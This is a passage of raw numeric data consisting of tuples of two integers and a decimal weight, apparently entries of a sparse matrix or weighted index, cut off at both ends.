32794,0.91),(112,32795,1.09669),(112,32796,0.95669),(112,32797,1.05),(112,32798,0.86331),(123,32798,0.86331),(112,32799,0.91),(112,32800,0.95669),(112,32801,1.05),(112,32802,1.02669),(112,32803,0.98),(112,32804,1.02669),(112,32805,0.91),(112,32806,1.09669),(112,32807,0.88669),(112,32808,1.07331),(112,32809,0.88669),(112,32810,1.00331),(112,32811,0.81669),(116,32811,0.81669),(112,32812,0.93331),(112,32813,0.91),(112,32814,1.12),(112,32815,0.84),(112,32816,0.93331),(112,32817,1.07331),(112,32818,0.93331),(112,32819,1.05),(112,32820,0.91),(112,32821,0.86331),(112,32822,0.93331),(112,32823,0.98),(112,32824,0.88669),(112,32825,0.95669),(112,32826,0.95669),(112,32827,1.12),(112,32848,0.23331),(112,32849,0.98),(112,32850,1.02669),(112,32851,0.28),(112,32852,1.09669),(112,32853,1.23669),(112,32854,0.95669),(112,32855,0.91),(112,32856,1.05),(112,33052,2.4666),(112,33053,0.32669),(112,33054,0.95669),(112,33055,1.07331),(112,33056,0.74662),(112,33057,0.95669),(112,33058,1.05),(112,33059,0.95669),(112,33060,1.07331),(112,33061,1.00331),(112,33062,1.14331),(112,33063,0.95669),(112,33064,1.09669),(112,33065,0.91),(112,33066,1.09669),(112,33067,0.28),(118,33067,0.28),(112,33068,0.91),(112,33069,0.98),(112,33070,0.32669),(112,33071,0.93331),(112,33072,0.98),(112,33073,0.32669),(112,33074,1.09669),(112,33075,1.23669),(112,33076,0.42),(112,33077,1.02669),(112,33078,1.21331),(112,33079,0.28),(112,33080,0.95669),(112,33081,1.05),(112,33082,0.18669),(112,33083,0.88669),(112,33084,1.07331),(112,33085,0.46669),(112,33086,1.12),(112,33087,1.30669),(112,33088,1.09669),(112,33089,1.19),(112,33090,0.37331),(118,33090,0.37331),(121,33090,0.37331),(112,33091,0.98),(112,33092,1.09669),(112,33093,1.05),(112,33094,1.12),(112,33095,1.07331),(112,33096,1.14331),(113,33826,0.46669),(113,33827,1.12),(113,33828,1.4),(113,33829,1.09669),(113,33830,1.16669),(113,33831,1.12),(113,33832,1.19),(113,33833,0.93331),(113,33834,1.09669),(128,33835,1.96),(113,33835,3.92),(113,33836,2.14662),(113,33837,1.07331),(113,33838,1.14331),(113,33839,0.86331),(113,33840,0.98),(113,33841,1.00331),(113,33842,1.14331),(113,33843,0.98),(113,33844,1.05),(113,33871,0.32669),(116,33871,0.32669),(117,33871,0.65338),(118,33871,0.98007),(113,33872,0.95669),(113,33873,1.09669),(113,33874,0.14),(113,33875,0.86331),(113,33876,1.00331),(113,33877,0.28),(113,33878,0.98),(113,33879,1.07331),(113,33880,0.32669),(128,33880,0.65338),(113,33881,0.98),(113,33882,1.09669),(113,33883,0.93331),(113,33884,1.05),(119,33885,0.18669),(113,33885,0.37338),(113,33886,0.91),(113,33887,1.05),(113,33888,0.95669),(113,33889,1.09669),(113,33890,0.84),(113,33891,0.98),(113,33892,1.00331),(113,33893,0.86331),(116,33893,0.86331),(113,33894,1.00331),(113,33895,1.09669),(113,33896,1.09669),(113,33897,1.02669),(113,33898,1.12),(113,33899,1.82),(113,33900,1.12),(113,33901,1.02669),(113,33902,1.02669),(113,33903,1.12),(113,33904,0.91),(113,33905,1.07331),(113,33906,1.77338),(113,33907,1.00331),(113,33908,1.07331),(113,33909,0.91),(128,33909,0.91),(113,33910,0.95669),(113,33911,1.05),(113,33912,1.07331),(113,33913,1.07331),(113,33914,0.95669),(128,33914,0.95669),(113,33915,1.02669),(113,33916,0.93331),(113,33917,0.95669),(113,33918,1.00331),(113,33919,1.07331),(113,33920,1.07331),(113,33921,1.02669),(113,33922,1.00331),(113,33923,1.00331),(113,33924,1.02669),(113,33925,1.00331),(113,33926,1.00331),(113,33927,0.88669),(113,33928,1.02669),(113,33929,0.91),(113,33930,1.07331),(113,33931,0.88669),(113,33932,1.05),(113,33933,1.02669),(113,33934,1.12),(113,33935,1.05),(113,33936,1.02669),(113,33937,0.98),(113,33938,1.07331),(113,33939,0.95669),(113,33940,1.07331),(113,33941,1.02669),(113,33942,1.19),(113,33943,0.32669),(113,33944,0.93331),(113,33945,1.00331),(113,34034,1.00331),(113,34035,1.19),(113,34036,0.91),(113,34037,1.00331),(113,34038,0.93331),(113,34039,0.42),(113,34040,1.14331),(113,34041,1.23669),(113,34042,1.02669),(113,34043,0.86331),(113,34044,1.02669),(113,34045,0.88669),(113,34046,0.98),(113,34047,0.86331),(113,34048,1.00331),(113,34049,1.82),(113,34050,1.05),(113,34051,1.07331),(113,34052,0.86331),(113,34053,0.93331),(113,34054,0.95669),(113,34055,0.95669),(113,34056,1.00331),(113,34057,1.14331),(113,34058,0.28),(113,34059,0.93331),(113,34060,1.05),(113,34061,0.88669),(113,34062,1.14331),(113,34063,0.86331),(113,34064,1.00331),(113,34065,0.42),(113,34066,0.98),(113,34067,1.07331),(113,34068,0.28),(113,34069,0.93331),(113,34070,1.07331),(113,34071,0.42),(113,34072,1.12),(113,34073,1.23669),(113,34074,0.32669),(113,34075,1.00331),(113,34076,1.07331),(113,34077,0.95669),(113,34078,1.14331),(113,34079,0.88669),(113,34080,0.93331),(113,34081,0.86331),(113,34082,1.00331),(113,34083,0.95669),(113,34084,0.81669),(113,34085,0.98),(113,34086,1.00331),(128,34086,1.00331),(113,34087,0.95669),(113,34088,1.05),(113,34089,0.93331),(113,34090,1.00331),(113,34091,0.88669),(113,34092,1.02669),(113,34093,0.91),(113,34094,1.12),(113,34095,0.88669),(113,34096,1.05),(113,34097,1.00331),(113,34098,1.09669),(113,34099,0.93331),(113,34100,1.09669),(113,34101,1.02669),(113,34102,1.21331),(117,34108,0.18669),(123,34108,0.18669),(113,34108,0.37338),(113,34109,0.91),(113,34110,1.23669),(113,34111,0.98),(113,34112,1.19),(113,34465,0.18669),(113,34466,0.88669),(113,34467,1.00331),(113,34468,0.42),(113,34469,1.00331),(113,34470,1.21331),(113,34471,1.07331),(113,34472,1.23669),(113,34473,1.05),(113,34474,1.21331),(113,34475,0.60669),(113,34476,1.12),(113,34477,1.26),(113,34478,0.88669),(113,34479,1.00331),(113,34480,1.07331),(113,34481,1.16669),(113,34482,1.02669),(113,34483,1.14331),(113,34484,0.88669),(113,34485,1.02669),(113,34486,0.91),(128,34486,0.91),(113,34487,1.00331),(128,34487,1.00331),(113,34488,1.86662),(113,34489,1.02669),(113,34490,1.00331),(113,34491,0.91),(113,34492,1.12),(113,34493,0.93331),(113,34494,1.16669),(113,34495,0.98),(113,34496,1.07331),(113,34497,0.93331),(113,34498,1.09669),(113,34499,1.77338),(128,34499,2.66007),(113,34500,1.00331),(113,34501,0.98),(128,34501,0.98),(113,34502,1.00331),(128,34502,1.00331),(113,34503,1.07331),(113,34504,1.82),(113,34505,1.02669),(113,34506,1.05),(113,34507,1.14331),(113,34508,0.98),(113,34509,1.07331),(113,34510,0.91),(128,34510,0.91),(113,34511,1.05),(113,34512,0.98),(128,34512,0.98),(113,34513,1.09669),(128,34514,3.82676),(113,34514,5.74014),(113,34515,1.07331),(113,34516,2.1),(113,34517,1.12),(128,34517,1.12),(113,34518,1.14331),(113,34519,1.19),(113,34520,0.93331),(113,34521,1.02669),(113,34522,0.93331),(128,34522,0.93331),(113,34523,1.07331),(128,34523,1.07331),(113,34524,1.00331),(113,34525,1.09669),(113,34526,0.95669),(113,34527,1.09669),(113,34528,0.46662),(113,34529,1.82),(113,34530,1.00331),(113,34531,1.05),(113,34532,1.02669),(113,34533,1.26),(113,34534,0.42),(113,34535,1.09669),(113,34536,1.21331),(113,34537,0.51331),(113,34538,1.07331),(113,34539,1.21331),(113,34540,1.07331),(113,34541,1.23669),(113,34542,0.51331),(113,34543,1.02669),(113,34544,1.23669),(123,34545,0.56),(113,34545,1.12),(113,34546,1.19),(113,34547,1.4),(113,34548,1.12),(113,34549,1.28331),(113,34550,0.7),(113,34551,1.14331),(113,34552,1.4),(113,34553,0.37331),(113,34554,1.00331),(113,34555,1.14331),(113,34556,0.37331),(113,34557,1.02669),(113,34558,1.19),(113,34559,0.42),(113,34560,1.00331),(113,34561,1.14331),(113,34562,0.46669),(117,34562,0.46669),(118,34562,0.93338),(113,34563,1.07331),(113,34564,1.19),(114,35354,0.95669),(114,35355,1.02669),(114,35356,0.81669),(114,35357,0.88669),(114,35358,0.86331),(114,35359,0.93331),(114,35360,0.32669),(114,35361,1.07331),(114,35362,1.28331),(114,35363,0.32669),(114,35364,0.93331),(114,35365,1.07331),(114,35366,0.95669),(114,35367,1.21331),(114,35368,1.07331),(114,35369,1.12),(114,35370,0.37331),(114,35371,0.93331),(114,35372,1.09669),(114,35373,0.93331),(114,35374,1.16669),(114,35375,0.98),(114,35376,1.12),(114,35377,1.82),(114,35378,1.14331),(114,35379,0.98),(114,35380,0.84),(114,35381,0.91),(114,35382,0.88669),(114,35383,1.26),(114,35384,1.21331),(114,35385,1.30669),(114,35386,0.86331),(114,35387,1.14331),(114,35388,0.88669),(114,35389,0.98),(114,35390,0.88669),(114,35391,0.95669),(114,35392,0.84),(114,35393,0.98),(114,35394,1.14331),(114,35395,1.19),(114,35396,0.23331),(114,35397,0.95669),(114,35398,1.21331),(114,35399,0.28),(114,35400,0.18669),(114,35401,1.00331),(114,35402,1.23669),(114,35440,0.84),(114,35441,0.93331),(114,35442,0.91),(114,35443,1.09669),(114,35444,0.18669),(120,35444,0.18669),(114,35445,1.07331),(114,35446,1.26),(114,35447,0.37331),(114,35448,0.95669),(114,35449,1.09669),(114,35450,0.23331),(114,35451,0.98),(114,35452,1.05),(114,35453,0.28),(114,35454,0.88669),(114,35455,1.02669),(114,35456,1.09669),(114,35486,0.93331),(114,35487,0.98),(114,35488,0.86331),(114,35489,0.93331),(114,35490,1.77338),(114,35491,1.07331),(114,35492,1.09669),(114,35493,0.88669),(114,35494,0.98),(114,35495,0.86331),(114,35496,0.98),(114,35497,1.00331),(114,35498,1.07331),(114,35499,0.88669),(114,35500,0.95669),(114,35501,0.88669),(114,35502,0.95669),(114,35503,0.93331),(114,35504,1.14331),(114,35505,0.91),(114,35506,0.98),(114,35507,0.95669),(114,35508,1.12),(114,35509,1.77338),(114,35510,1.07331),(114,35511,1.16669),(114,35512,0.93331),(114,35513,1.05),(114,35514,0.86331),(114,35515,1.12),(114,35516,0.95669),(114,35517,1.05),(114,35518,0.81669),(114,35519,0.98),(114,35520,0.42),(114,35521,0.95669),(114,35522,1.16669),(114,35523,1.12),(114,35524,1.21331),(114,35525,0.32669),(114,35526,1.00331),(114,35527,1.26),(114,35528,0.32669),(114,35529,0.95669),(114,35530,1.14331),(114,35531,0.7),(114,35532,1.30669),(114,35533,1.4),(114,35534,0.23331),(114,35535,1.07331),(114,35536,1.16669),(114,35537,0.91),(114,35538,1.02669),(114,35539,0.91),(114,35540,1.37669),(114,35541,0.88669),(114,35542,1.09669),(114,35543,0.90661),(114,35665,2.4666),(114,35666,0.23331),(114,35667,0.88669),(114,35668,1.07331),(114,35669,0.23331),(114,35670,1.05),(114,35671,1.23669),(114,35672,0.93324),(114,35673,1.19),(114,35674,1.4),(114,35675,1.00331),(114,35676,1.26),(114,35677,1.09669),(114,35678,1.16669),(114,35679,1.02669),(114,35680,1.16669),(114,35681,0.95669),(114,35682,0.91),(114,35683,0.95669),(114,35684,0.86331),(114,35685,0.93331),(114,35686,0.37331),(114,35687,1.07331),(114,35688,1.14331),(114,35689,0.23331),(114,35690,1.02669),(114,35691,1.12),(114,35692,0.42),(114,35693,1.02669),(114,35694,1.23669),(114,35695,0.28),(114,35696,0.91),(114,35697,1.02669),(114,35698,0.51331),(114,35699,1.02669),(114,35700,1.19),(114,35701,1.00331),(114,35702,0.86331),(114,35703,0.93331),(114,35704,1.00331),(114,35705,1.16669),(114,35706,0.32669),(114,35707,1.09669),(114,35708,1.23669),(114,35709,0.37331),(114,35710,1.12),(114,35711,1.19),(114,35712,0.23331),(114,35713,1.05),(114,35714,1.14331),(114,35715,0.65338),(114,35716,1.82),(114,35717,1.12),(114,35718,1.09669),(114,35719,0.37331),(114,35720,0.95669),(114,35721,1.16669),(114,35722,0.37331),(114,35723,0.98),(114,35724,1.07331),(114,35725,0.98),(114,35726,1.05),(116,36178,0.37331),(125,36187,3.26676),(120,36189,0.28),(123,36189,0.28),(125,36240,0.14),(117,36350,0.86331),(128,36367,0.23331),(119,36389,0.88669),(116,36574,0.88669),(116,36594,0.23331),(116,37177,0.84),(116,37178,0.95669),(116,37179,0.42),(116,37180,0.98),(116,37181,1.09669),(116,37182,0.95669),(116,37183,1.07331),(116,37184,1.07331),(116,37185,1.26),(116,37186,0.93331),(116,37187,1.12),(116,37188,0.98),(116,37189,1.05),(116,37190,0.28),(117,37190,0.28),(116,37191,0.91),(116,37192,1.00331),(116,37193,0.42),(116,37194,0.98),(116,37195,1.07331),(116,37196,1.16669),(116,37197,0.91),(116,37198,1.00331),(116,37199,0.98),(116,37200,2.94),(116,37201,1.23669),(116,37202,1.05),(116,37203,1.14331),(116,37204,1.09669),(116,37205,1.28331),(116,37206,1.07331),(116,37207,1.28331),(116,37208,0.93331),(116,37209,1.00331),(116,37210,1.02669),(116,37211,1.09669),(116,37212,0.93331),(116,37213,1.07331),(116,37214,1.00331),(116,37215,1.16669),(116,37216,0.98),(116,37217,1.16669),(116,37218,1.14331),(116,37219,1.33),(116,37220,1.00331),(116,37221,1.14331),(116,37222,1.07331),(116,37223,1.21331),(116,37224,1.00331),(116,37225,1.09669),(116,37226,1.05),(116,37227,1.23669),(116,37228,0.23331),(116,37229,1.00331),(116,37230,1.14331),(116,37236,1.07331),(116,37237,1.16669),(116,37238,0.91),(116,37239,1.02669),(116,37240,0.93331),(116,37241,1.05),(116,37242,0.95669),(116,37243,1.02669),(116,37244,0.95669),(116,37245,1.14331),(116,37246,0.95669),(116,37247,1.00331),(116,37248,0.88669),(116,37249,1.02669),(116,37250,6.78321),(116,37251,0.23331),(116,37252,0.91),(116,37253,1.00331),(116,37276,1.00331),(116,37277,1.09669),(116,37278,0.95669),(116,37279,0.46669),(116,37280,1.00331),(116,37281,1.09669),(116,37282,0.46669),(116,37283,1.00331),(116,37284,1.09669),(116,37285,0.88669),(116,37286,1.02669),(116,37287,0.84),(116,37288,0.91),(116,37289,0.84),(116,37290,1.02669),(116,37291,0.93331),(116,37292,1.19),(116,37293,0.88669),(116,37294,1.00331),(116,37295,0.95669),(116,37296,1.02669),(116,37297,1.23669),(116,37298,0.88669),(116,37299,0.95669),(116,37300,0.37331),(116,37301,1.00331),(116,37302,1.12),(116,37303,0.42),(116,37304,0.98),(116,37305,1.12),(116,37306,0.95669),(116,37307,0.84),(116,37308,0.91),(116,37309,0.88669),(116,37310,0.95669),(116,37311,0.98),(116,37312,1.05),(116,37317,0.18669),(116,37318,0.88669),(116,37319,1.00331),(116,37419,0.56),(116,37420,1.16669),(116,37421,1.21331),(116,37422,1.00331),(116,37423,1.07331),(116,37424,0.98),(116,37425,0.98),(116,37426,0.91),(116,37427,1.16669),(125,37428,0.37338),(116,37428,0.93345),(116,37429,1.05),(116,37430,1.23669),(116,37431,1.05),(116,37432,1.19),(125,37433,0.98),(116,37433,2.94),(116,37434,1.09669),(116,37435,1.26),(116,37436,1.12),(116,37437,1.07331),(116,37438,1.19),(116,37439,0.98),(116,37440,1.05),(117,38007,0.81669),(125,38007,0.81669),(117,38008,0.95669),(117,38009,0.28),(117,38010,0.91),(117,38011,1.00331),(117,38012,0.42),(117,38013,0.98),(117,38014,1.19),(117,38015,0.37331),(117,38016,1.07331),(117,38017,1.23669),(117,38018,0.28),(117,38019,1.02669),(117,38020,1.23669),(117,38021,0.37331),(117,38022,0.93331),(117,38023,1.09669),(117,38024,0.42),(117,38025,1.14331),(117,38026,1.26),(117,38027,0.42),(117,38028,1.02669),(117,38029,1.09669),(117,38030,1.00331),(117,38031,1.12),(117,38032,0.23331),(117,38033,0.95669),(117,38034,1.07331),(117,38035,0.32669),(117,38036,1.05),(117,38037,1.16669),(117,38038,0.84),(117,38039,1.00331),(117,38040,1.14331),(117,38041,1.26),(117,38042,0.95669),(117,38043,0.88669),(117,38044,0.95669),(117,38045,1.00331),(117,38046,1.12),(117,38047,0.88669),(117,38048,0.95669),(117,38049,0.95669),(117,38050,1.07331),(117,38051,0.91),(117,38052,1.02669),(117,38053,0.98),(117,38054,1.07331),(117,38055,0.91),(117,38056,1.14331),(117,38057,1.05),(117,38058,1.23669),(117,38059,0.95669),(117,38106,0.74662),(117,38107,1.07331),(117,38108,1.28331),(117,38109,1.00331),(117,38110,1.21331),(117,38111,0.93331),(117,38112,1.02669),(117,38113,1.96),(117,38114,1.09669),(117,38115,1.05),(117,38116,1.07331),(117,38117,1.19),(117,38118,1.02669),(117,38119,1.16669),(117,38120,0.37331),(117,38121,1.00331),(117,38122,1.09669),(117,38123,0.37331),(117,38124,1.00331),(117,38125,1.19),(117,38126,0.28),(117,38127,0.91),(117,38128,1.00331),(117,38129,0.84),(117,38130,0.88669),(117,38131,1.00331),(117,38132,1.09669),(117,38133,1.02669),(117,38134,0.93331),(117,38135,0.42),(119,38135,0.42),(117,38136,0.98),(117,38137,1.07331),(117,38138,0.88669),(117,38139,1.00331),(117,38140,1.07331),(117,38141,1.19),(117,38142,1.16669),(117,38143,0.93331),(117,38144,1.21331),(117,38145,1.07331),(117,38146,1.00331),(117,38216,0.84),(117,38217,0.95669),(117,38218,0.81669),(117,38219,1.00331),(117,38220,0.93331),(117,38221,0.84),(117,38222,0.91),(117,38223,0.86331),(117,38224,0.98),(117,38225,0.98),(117,38226,0.18669),(117,38227,0.91),(117,38228,1.02669),(117,38229,0.42),(117,38230,1.09669),(117,38231,1.35331),(117,38232,0.23331),(117,38233,0.93331),(117,38234,1.00331),(117,38235,0.86331),(117,38236,1.00331),(117,38237,1.02669),(117,38238,1.26),(117,38239,0.86331),(117,38240,0.95669),(117,38241,1.00331),(117,38242,0.98),(117,38243,0.86331),(117,38244,0.93331),(117,38245,1.02669),(117,38246,1.02669),(117,38247,1.14331),(117,38248,1.09669),(117,38249,1.19),(117,38250,1.00331),(117,38251,1.26),(117,38252,0.56),(117,38253,1.21331),(117,38254,1.37669),(117,38255,0.84),(120,38255,0.84),(117,38256,0.95669),(117,38257,0.95669),(117,38258,1.12),(117,38259,0.91),(117,38260,1.07331),(117,38261,0.86331),(117,38262,1.05),(117,38263,0.95669),(117,38264,0.95669),(117,38265,1.09669),(117,38266,0.84),(117,38267,0.91),(117,38268,0.91),(117,38269,1.05),(117,38270,0.86331),(117,38271,0.95669),(117,38272,0.91),(117,38273,0.98),(117,38274,0.91),(117,38275,0.84),(117,38276,0.98),(117,38277,0.98),(117,38278,1.12),(117,38279,0.86331),(120,38279,1.72662),(117,38280,0.98),(117,38281,0.86331),(117,38282,0.93331),(117,38283,0.84),(117,38284,1.05),(117,38285,0.88669),(117,38286,1.05),(117,38287,0.02919),(120,38287,0.02919),(125,38287,0.02919),(126,38287,0.02919),(117,38288,0.93331),(117,38289,1.00331),(117,38290,0.93331),(117,38291,1.00331),(117,38292,0.81669),(117,38293,1.00331),(117,38294,0.86331),(117,38295,0.95669),(117,38296,0.95669),(117,38297,1.12),(117,38298,0.95669),(117,38299,1.07331),(117,38300,0.93331),(117,38301,0.86331),(117,38302,0.91),(117,38303,0.86331),(117,38304,0.93331),(117,38305,0.95669),(117,38306,1.68),(117,38307,0.95669),(117,38308,1.05),(120,38309,0.84),(126,38309,0.84),(117,38309,1.68),(117,38310,1.00331),(117,38311,0.91),(126,38311,0.91),(117,38312,0.84),(117,38313,0.95669),(117,38314,0.86331),(117,38315,0.93331),(117,38316,0.95669),(117,38317,0.95669),(117,38318,0.98),(117,38319,1.05),(117,38320,0.88669),(117,38321,0.95669),(117,38335,0.37331),(117,38336,0.98),(117,38337,1.14331),(117,38338,0.18669),(120,38338,0.18669),(117,38339,0.86331),(117,38340,1.23669),(117,38341,0.88669),(117,38342,1.02669),(117,38343,0.86331),(117,38344,0.98),(117,38560,0.23331),(123,38560,0.23331),(117,38561,0.88669),(117,38562,0.98),(117,38563,0.23331),(117,38564,0.91),(117,38565,1.07331),(117,38566,0.98),(117,38567,1.12),(117,38568,1.91338),(117,38569,1.23669),(117,38570,1.09669),(117,38571,0.91),(117,38572,0.95669),(117,38573,1.14331),(117,38574,1.12),(117,38575,1.30669),(117,38576,0.91),(117,38577,0.98),(117,38578,0.18669),(117,38579,0.86331),(117,38580,1.00331),(117,38581,0.88669),(117,38582,0.93331),(117,38583,7.4),(117,38584,0.98),(117,38585,1.14331),(117,38586,0.23331),(117,38587,0.91),(117,38588,1.02669),(117,38589,0.18669),(117,38590,0.95669),(117,38591,1.16669),(117,38592,2.8),(117,38593,1.00331),(117,38594,1.12),(117,38595,1.02669),(117,38596,1.19),(117,38597,1.02669),(117,38598,1.26),(117,38599,0.93331),(117,38600,1.05),(117,38601,0.95669),(117,38602,1.05),(117,38603,0.91),(117,38604,1.00331),(117,38605,0.98),(117,38606,1.02669),(117,38607,0.98),(117,38608,1.09669),(117,38609,1.00331),(117,38610,1.07331),(117,38611,0.95669),(117,38612,1.14331),(117,38613,0.23331),(117,38614,0.91),(117,38615,1.07331),(117,38616,0.28),(119,38616,0.28),(117,38617,0.93331),(117,38618,1.12),(117,38619,1.00331),(117,38620,1.07331),(117,38621,1.21331),(117,38622,0.91),(117,38623,1.02669),(117,38624,1.12),(117,38625,1.28331),(117,38626,0.84),(117,38627,0.95669),(118,39257,0.28),(118,39258,0.93331),(118,39259,1.12),(118,39260,0.32669),(118,39261,0.95669),(118,39262,1.12),(118,39263,0.88669),(118,39264,1.14331),(118,39265,0.56),(118,39266,1.09669),(118,39267,1.23669),(118,39268,0.37331),(118,39269,1.12),(118,39270,1.23669),(118,39271,1.00331),(118,39272,1.16669),(118,39273,0.37331),(118,39274,1.02669),(118,39275,1.16669),(118,39276,0.18669),(118,39277,1.02669),(118,39278,1.16669),(118,39279,1.00331),(118,39280,0.23331),(118,39281,1.00331),(118,39282,1.12),(118,39283,1.02669),(118,39298,0.23331),(118,39299,0.88669),(118,39300,1.00331),(118,39301,0.14),(118,39302,0.88669),(118,39303,0.98),(118,39304,1.05),(118,39305,1.12),(118,39306,1.07331),(118,39307,1.23669),(118,39308,0.98),(118,39309,1.09669),(118,39310,1.05),(118,39311,1.14331),(118,39312,0.18669),(118,39313,0.86331),(118,39314,0.98),(118,39315,1.05),(118,39316,1.37669),(118,39317,0.37331),(118,39318,1.00331),(118,39319,1.16669),(118,39320,0.46669),(118,39321,1.07331),(118,39322,1.14331),(118,39323,0.98),(118,39324,1.12),(118,39325,1.09669),(118,39326,1.05),(118,39327,0.28),(123,39327,0.28),(118,39328,1.02669),(118,39329,1.14331),(118,39330,0.32669),(118,39331,0.93331),(118,39332,1.07331),(118,39333,0.42),(118,39334,1.02669),(118,39335,1.12),(118,39336,0.95669),(118,39337,1.09669),(118,39338,0.18669),(119,39338,0.18669),(118,39339,0.88669),(118,39340,1.00331),(118,39363,0.91),(118,39364,0.91),(118,39365,1.02669),(118,39366,1.00331),(118,39367,0.95669),(118,39368,1.14331),(118,39369,0.46669),(118,39370,1.09669),(118,39371,1.30669),(118,39372,0.37331),(118,39373,1.09669),(118,39374,1.26),(118,39375,0.28),(119,39375,0.28),(118,39376,0.91),(119,39376,0.91),(118,39377,1.05),(118,39378,0.32669),(118,39379,1.00331),(118,39380,1.14331),(118,39381,0.95669),(118,39382,1.00331),(118,39383,1.09669),(118,39384,0.93331),(118,39385,1.00331),(118,39386,1.09669),(118,39387,0.42),(118,39388,0.98),(118,39389,1.16669),(118,39398,0.32669),(118,39399,0.98),(118,39400,1.21331),(118,39401,0.23331),(118,39402,0.88669),(118,39403,1.02669),(118,39404,0.23331),(118,39405,0.98),(118,39406,1.09669),(118,39407,0.93345),(118,39408,0.88669),(118,39409,1.02669),(118,39410,0.91),(118,39411,0.98),(118,39412,0.86331),(118,39413,0.91),(118,39414,0.91),(118,39415,1.09669),(118,39416,0.98),(118,39417,1.09669),(118,39418,0.09331),(118,39419,0.79331),(118,39420,0.95669),(118,39544,1.00331),(118,39545,1.16669),(118,39546,1.02669),(118,39547,1.07331),(118,39548,0.93331),(118,39549,1.05),(118,39550,0.42),(118,39551,1.05),(118,39552,1.12),(118,39553,0.95669),(118,39554,1.05),(118,39555,0.32669),(119,39555,0.32669),(120,39555,0.32669),(118,39556,0.93331),(118,39557,1.02669),(118,39558,0.95669),(118,39559,1.21331),(118,39560,1.02669),(118,39561,1.09669),(118,39562,1.05),(118,39563,1.30669),(118,39564,1.12),(118,39565,1.35331),(118,39566,0.28),(118,39567,1.00331),(118,39568,1.09669),(119,39830,0.34),(119,40151,0.37331),(119,40152,1.00331),(119,40153,1.07331),(119,40154,1.02669),(119,40155,1.14331),(119,40156,0.86331),(119,40157,1.05),(119,40158,0.32669),(119,40159,1.02669),(119,40160,1.19),(119,40161,0.42),(119,40162,1.09669),(119,40163,1.33),(119,40164,0.32669),(119,40165,1.00331),(119,40166,1.12),(119,40167,1.02669),(119,40168,0.32669),(119,40169,0.98),(119,40170,1.16669),(119,40171,0.98),(119,40172,1.09669),(119,40173,0.93331),(126,40173,0.93331),(119,40174,0.93331),(119,40175,1.02669),(123,40176,0.18669),(125,40176,0.18669),(119,40176,0.37338),(119,40177,0.88669),(119,40178,0.93331),(119,40179,0.98),(119,40180,1.23669),(119,40181,0.98),(119,40182,1.12),(119,40183,0.91),(119,40184,1.05),(119,40185,0.37331),(119,40186,1.07331),(119,40187,1.21331),(119,40188,0.37331),(119,40189,1.07331),(119,40190,1.14331),(119,40191,0.18669),(119,40192,0.93331),(119,40193,0.98),(119,40225,0.28),(119,40226,1.02669),(119,40227,1.09669),(119,40228,0.88669),(119,40229,1.00331),(119,40230,0.28),(119,40231,1.07331),(119,40232,1.16669),(119,40233,1.09669),(119,40234,1.16669),(119,40235,0.95669),(119,40236,1.09669),(119,40237,0.88669),(126,40237,0.88669),(119,40238,1.12),(119,40239,0.56),(119,40240,1.19),(119,40241,1.28331),(119,40242,0.98),(119,40243,1.09669),(119,40244,0.91),(119,40245,1.09669),(119,40246,0.18669),(119,40247,0.93331),(119,40248,1.02669),(119,40249,0.91),(119,40250,1.09669),(119,40251,1.02669),(119,40252,1.30669),(119,40253,0.18669),(119,40254,0.84),(119,40255,0.93331),(119,40256,0.91),(119,40257,0.98),(119,40258,0.86331),(119,40259,0.93331),(119,40260,0.91),(119,40261,1.05),(119,40262,0.23331),(126,40262,0.23331),(119,40263,0.88669),(119,40264,1.05),(119,40265,1.00331),(119,40266,1.16669),(119,40267,1.77338),(119,40268,1.05),(119,40269,0.91),(119,40270,0.95669),(119,40271,0.95669),(119,40272,1.05),(119,40273,1.14331),(119,40274,1.00331),(119,40275,0.88669),(119,40276,1.05),(119,40277,0.23331),(134,40277,0.23331),(119,40278,0.91),(119,40279,1.00331),(119,40395,0.86331),(119,40396,0.93331),(119,40397,0.86331),(119,40398,0.93331),(119,40399,0.84),(119,40400,0.93331),(119,40401,0.93331),(119,40402,1.00331),(119,40403,0.93331),(119,40404,1.02669),(119,40405,0.98),(119,40406,0.93331),(119,40407,1.02669),(119,40408,2.1),(119,40409,0.91),(119,40410,0.98),(119,40411,0.93331),(119,40412,0.93331),(119,40413,1.02669),(119,40414,0.86331),(119,40415,0.98),(119,40416,1.86662),(119,40417,2.1),(119,40418,0.98),(119,40419,1.02669),(119,40420,0.98),(119,40421,0.95669),(119,40422,1.09669),(119,40423,0.91),(119,40424,0.98),(119,40425,1.09669),(119,40426,0.18669),(119,40427,0.86331),(119,40428,1.00331),(119,40429,0.56),(119,40430,1.05),(119,40431,1.23669),(119,40432,1.00331),(119,40433,1.05),(119,40434,1.09669),(119,40435,1.07331),(119,40436,1.02669),(119,40437,0.91),(119,40438,0.86331),(119,40439,0.91),(119,40440,0.98),(119,40441,1.16669),(119,40442,0.98),(119,40443,0.56),(119,40444,0.93331),(119,40445,1.05),(119,40446,0.91),(119,40447,1.12),(119,40448,1.14331),(119,40449,0.88669),(119,40450,0.93331),(119,40451,1.02669),(119,40478,0.32669),(119,40479,1.02669),(119,40480,1.19),(119,40481,0.18669),(125,40481,0.18669),(119,40482,0.98),(119,40483,1.14331),(119,40619,1.16669),(119,40620,0.86331),(119,40621,0.91),(119,40622,0.23331),(119,40623,0.98),(119,40624,1.16669),(119,40625,1.05),(119,40626,0.32669),(119,40627,0.95669),(119,40628,1.02669),(119,40629,0.32669),(119,40630,0.93331),(119,40631,1.02669),(119,40632,0.23331),(119,40633,0.93331),(119,40634,1.02669),(119,40635,0.98),(119,40636,1.02669),(119,40637,1.00331),(119,40638,1.12),(119,40639,0.46669),(119,40640,1.02669),(119,40641,1.23669),(119,40642,1.26),(119,40643,1.00331),(119,40644,1.07331),(119,40645,1.05),(119,40646,1.21331),(119,40647,1.09669),(119,40648,1.16669),(119,40649,0.98),(119,40650,1.09669),(119,40651,1.00331),(119,40652,1.14331),(119,40653,0.32669),(119,40654,1.05),(119,40655,1.19),(120,41569,0.98),(120,41570,1.05),(120,41571,0.28),(120,41572,0.95669),(120,41573,1.05),(120,41574,0.93331),(120,41575,1.00331),(120,41576,0.46662),(120,41577,0.95669),(120,41578,1.12),(120,41579,1.02669),(120,41580,1.09669),(120,41581,0.88669),(120,41582,0.98),(120,41583,1.02669),(120,41584,1.09669),(120,41585,1.68),(120,41586,1.86662),(120,41587,1.07331),(120,41588,0.18669),(120,41589,0.86331),(120,41590,1.09669),(120,41591,0.56007),(120,41592,0.86331),(120,41593,0.98),(120,41594,0.88669),(120,41595,0.98),(120,41596,0.86331),(120,41597,1.07331),(120,41598,0.14),(120,41599,0.88669),(120,41600,0.93331),(120,41601,1.02669),(120,41602,1.09669),(120,41603,0.18669),(120,41604,0.88669),